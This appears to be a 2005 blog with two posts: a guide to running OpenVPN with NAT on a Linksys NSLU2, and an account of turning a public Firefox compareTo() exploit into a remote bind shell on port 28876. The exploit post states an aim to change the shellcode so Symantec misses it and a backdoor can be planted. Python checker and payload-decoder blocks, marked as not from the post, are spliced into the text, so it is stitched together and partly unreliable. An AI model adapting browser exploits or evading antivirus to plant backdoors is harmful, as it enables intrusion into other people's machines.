Well, I finally picked up an NSLU2 by Linksys. I have to say I am pretty impressed so far. A little device that fits in my hand just replaced 2 of my boxes at home: one for my fileserver and one for my OpenVPN server. Maybe at a later date I will go over how to flash it with Unslung, but it is pretty easy, so this doc is just for me to remember how I set up my OpenVPN.
So, first things first: go buy the NSLU2, then download Unslung and flash it.
http://www.nslu2-linux.org/
Now that you have it flashed, I put on a few packages first to let me work with it a bit more comfortably:
OpenSSH
Vim
Bash
Grep
OK, now we are ready.
SSH to your NSLU2. If you have not set your password yet, the default password is "uNSLUng".
Install OpenVPN:
ipkg update;ipkg -force-depends install openvpn
Create the tun device node:
mkdir /dev/net
mknod /dev/net/tun c 10 200
Load the tun module:
insmod tun
Enable Routing:
echo 1 > /proc/sys/net/ipv4/ip_forward
Now it's time to generate our certs. I just downloaded OpenVPN onto my machine to create them; it goes much faster this way.
You can download the current OpenVPN version here.
http://openvpn.net/
Also more details on this process can be found here.
http://openvpn.net/howto.html#pki
cd into the easy-rsa directory, edit the vars file with your information, and then run:
. ./vars
./clean-all
./build-ca
Now that the CA is up, we can build the keys for the server.
./build-key-server server
Now we have to build our client certs. I will only be building one for a single client. I also use password-protected certs.
./build-key-pass client1
Note: If you want other clients, repeat the step with client2 (or whatever you like). Remember to always use a unique common name for each client.
Generate the Diffie-Hellman parameters.
./build-dh
Now we need to create a directory on the NSLU2 to copy our keys to.
mkdir -p /opt/etc/openvpn/keys
Copy these files to the NSLU2 (the exact set may be a bit different for you):
ca.crt, ca.key, dh1024.pem, server.crt, server.key, 01.pem, 02.pem, 03.pem, and 04.pem
Now let's create a server.conf on the NSLU2 and write our conf file.
You can get a sample conf file from the previous download. I will just touch on the main things I changed below.
I use TCP so I can proxy it:
# TCP or UDP server?
proto tcp
;proto udp
Choose a cipher of your choice. It must be the same on the client.
# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC # Blowfish (default)
;cipher AES-128-CBC # AES
;cipher DES-EDE3-CBC # Triple-DES
Make sure it switches to the unprivileged user nobody:
# You can uncomment this out on
# non-Windows systems.
user nobody
group nobody
That's pretty much it for the server side.
The client side is pretty much straightforward. Just make sure you have the right certs:
ca.crt
client1.crt
client1.key
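As an added example (not from the post), here is a small Python checker for the things above that bite people: server and client must agree on proto and cipher, the server should drop to user/group nobody, and private key files must not be readable by other users. It also flags ca.key in the keys directory, since the CA private key is only needed to sign new client certs and is safer kept off the VPN box; the sample configs and file listing are constructed.

```python
import os
import stat

def parse_ovpn(text):
    """Parse OpenVPN config text into {directive: [args]}; '#' and ';' start comments."""
    conf = {}
    for line in text.splitlines():
        for marker in ("#", ";"):  # OpenVPN treats both as comment starts, inline too
            line = line.split(marker, 1)[0]
        parts = line.split()
        if parts:
            conf[parts[0]] = parts[1:]
    return conf

def check_pair(server, client):
    """List settings that must match between server and client, plus a missing privilege drop."""
    problems = []
    # OpenVPN 2.0 defaults when a directive is absent: proto udp, cipher BF-CBC
    for directive, default in (("proto", ["udp"]), ("cipher", ["BF-CBC"])):
        s, c = server.get(directive, default), client.get(directive, default)
        if s != c:
            problems.append("%s differs: server %s, client %s" % (directive, " ".join(s), " ".join(c)))
    for directive in ("user", "group"):
        if directive not in server:
            problems.append("server keeps root privileges: '%s nobody' not set" % directive)
    return problems

def check_key_listing(entries):
    """entries: (filename, permission bits) pairs. Flags the CA private key sitting on the
    VPN box and private keys that other local users can read."""
    problems = []
    for name, mode in entries:
        if name == "ca.key":
            problems.append("ca.key is on the VPN server; keep the CA private key offline")
        elif name.endswith(".key") and mode & 0o077:
            problems.append("%s is readable by others (mode %o)" % (name, mode))
    return problems

def scan_key_dir(path):
    """Run check_key_listing over a real directory such as /opt/etc/openvpn/keys."""
    return check_key_listing([(n, stat.S_IMODE(os.stat(os.path.join(path, n)).st_mode))
                              for n in os.listdir(path)])

# Constructed samples: the post's server settings against a client left on the UDP default,
# and the file set the post copies to the NSLU2 with typical modes.
SAMPLE_SERVER = "proto tcp\n;proto udp\ncipher AES-128-CBC # AES\nuser nobody\ngroup nobody\n"
SAMPLE_CLIENT = "client\nproto udp\ncipher AES-128-CBC\nca ca.crt\ncert client1.crt\nkey client1.key\n"
SAMPLE_KEYS = [("ca.crt", 0o644), ("ca.key", 0o600), ("server.key", 0o644), ("dh1024.pem", 0o644)]
```

scan_key_dir is the one to run on the NSLU2 itself; the other functions only need the config text.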
Now back to the NSLU2.
For a while I had been trying to get MASQUERADE in iptables to work, but since the module is not in the ipkg repository and it is not enabled in the kernel, this was not working. If you view the comment below, Cooper did get this working and wrote a how-to for it. Since he wanted MASQUERADE for something a bit different, I will document how I did it. I wanted it so I can hit other boxes behind the VPN without having to create SSH tunnels (which is what I was doing).
Here is Cooper's doc on the NSLU site.
http://www.nslu2-linux.org/wiki/HowTo/EnableIPMasquerading
Now, for what I did for MASQUERADE.
First, install the MASQUERADE modules. I used pre-compiled ones since I'm lazy; you can compile them yourself if you like, and Cooper's doc shows you how. Below is a link to pre-compiled ones.
http://www.defector.de/docs/nslu2-ipmasq.htm
Now install them:
ipkg-cl install kernel-module-ipt-masquerade_2.4.22.l2.3r63-r7_nslu2.ipk
ipkg-cl install kernel-module-ipt-state_2.4.22.l2.3r63-r7_nslu2.ipk
Now load the modules:
insmod ip_tables
insmod iptable_filter
insmod ip_conntrack
insmod iptable_nat
insmod ipt_state
insmod ipt_MASQUERADE
If some modules cannot be found, I may have forgotten to document them while I was messing around with different modules. You can easily find and install them. I actually don't think you even need ipt_state or iptable_filter, but I put them in anyway to have a more complete iptables (in case of future work).
Example:
ipkg list |grep conntrack
Now let's get all this stuff to run on reboot.
Create /opt/etc/init.d/S24openvpn with the contents below and make it executable (chmod +x). The shebang has to be the very first line of the file.
#!/bin/sh
# /opt/etc/init.d/S24openvpn: load the modules, turn on NAT and start OpenVPN at boot
# stop an already running OpenVPN so we do not end up with two
if [ -n "`pidof openvpn`" ]; then
    /bin/killall openvpn 2>/dev/null
fi
# load kernel modules
/sbin/insmod tun
/sbin/insmod ip_tables
/sbin/insmod iptable_filter
/sbin/insmod ip_conntrack
/sbin/insmod iptable_nat
/sbin/insmod ipt_state
/sbin/insmod ipt_MASQUERADE
# enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# set iptables rule: masquerade VPN clients (10.8.0.0/24) leaving on the LAN interface ixp0
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o ixp0 -j MASQUERADE
# start the VPN tunnel in daemon mode, logging to /var/log/openvpn.log
/opt/sbin/openvpn --cd /opt/etc/openvpn --daemon \
    --log-append /var/log/openvpn.log \
    --config server.conf
Now you are all set! Test it out!
Thanks to everyone!
Sunday, December 18, 2005
Thursday, December 15, 2005
Fun w/ FireFox compareTo() Remote Execution
I love Firefox, but I just could not resist this.
A vulnerability was found in Mozilla Firefox <= 1.04 when using the compareTo() function.
http://www.milw0rm.com/id.php?id=1369
You can find older versions of Firefox for testing here.
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/
The exploit payload contained just a return (it would only close the browser). And what fun is that?
// Payload - Just return..
var payLoadCode=unescape("%u9090%u90C3");
So I thought, let's actually execute some arbitrary code.
The thing that makes it hard is that we cannot just use normal shellcode. We have to convert it to UTF-16 so the browser can execute it. I suppose UTF-8 would work also.
For example:
\x29 would be %u785c%u3932
So here we go: create the shellcode and encode it to UTF-16.
How about something simple like calc.exe?
I found a shellcode encoder. I have had mixed results with it, but you can find it here.
http://www.milw0rm.com/id.php?id=656
Loaded the page, Firefox shut down and calc.exe popped up. We can execute! (tested on WinXP SP2)
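To look at such a string from the analysis side rather than the encoding side, here is an added Python helper (not from the post): it pulls unescape("%u...") strings out of a page, reverses them into the bytes they occupy in memory as UTF-16LE (low byte first), and reports the things an analyst checks first. Decoding the post's own example this way shows that %u785c%u3932 carries the four ASCII characters of the text \x29 rather than the single byte 0x29; the sample page is constructed.

```python
import re

# %uXXXX escapes are what unescape() turns into 16-bit code units.
U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")
# An unescape( "..." + "..." ) call, string pieces possibly split across lines.
UNESCAPE_CALL = re.compile(r'unescape\s*\(\s*((?:"[^"]*"\s*\+?\s*)+)\)')

def u_escapes_to_bytes(text):
    """Turn %uXXXX escapes into the bytes the UTF-16LE string occupies in memory."""
    out = bytearray()
    for hexval in U_ESCAPE.findall(text):
        out += int(hexval, 16).to_bytes(2, "little")  # low byte first, as the CPU reads it
    return bytes(out)

def extract_payloads(html):
    """Decode every unescape("%u...") string found in a page."""
    return [u_escapes_to_bytes(m.group(1)) for m in UNESCAPE_CALL.finditer(html)]

def analyse(payload):
    """Properties an analyst looks at first: size, longest NOP (0x90) run, a RET (0xC3) byte."""
    longest = run = 0
    for b in payload:
        run = run + 1 if b == 0x90 else 0
        longest = max(longest, run)
    return {"length": len(payload), "longest_nop_run": longest,
            "has_ret": 0xC3 in payload, "ascii": payload.decode("ascii", "replace")}

# Constructed page holding the post's "just return" payload and its \x29 encoding example.
SAMPLE_PAGE = '''<script>
var payLoadCode=unescape("%u9090%u90C3");
var example=unescape("%u785c" +
"%u3932");
</script>'''

if __name__ == "__main__":
    for p in extract_payloads(SAMPLE_PAGE):
        print(analyse(p))
```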
While calc.exe was funny, it is not too useful. Let's bind a port so we can get a shell.
I tried creating different shellcode, things such as adding a user, port binding, cmd exec, and reverse shells, on both Linux and Windows. The shellcode was very touchy and had mixed results after encoding to UTF-16.
This win32 bind shell (port 28876) from SkyLined did work on WinXP SP2.
Opened the page in Firefox and telnetted to port 28876.
Symantec did, however, see it as being a Trojan about one minute later. I will look into changing the shellcode a bit in the hope of not triggering Symantec. Otherwise you would only have one minute after the exploit to plant a backdoor.
The exploit uses a method called spraying the stack. It's actually a pretty cool method by SkyLined to find a predictable address.
I will continue to work on this when time permits. If anyone is interested, I would like to see other UTF-16 encoded shellcode that works.
Here is a UTF-16 payload by SkyLined that is not supposed to set off virus scanners. I have not tested this one yet.
Below are some links to more info.
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0104.html
http://www.edup.tudelft.nl/~bjwever/advisory_msie_R6025.html.php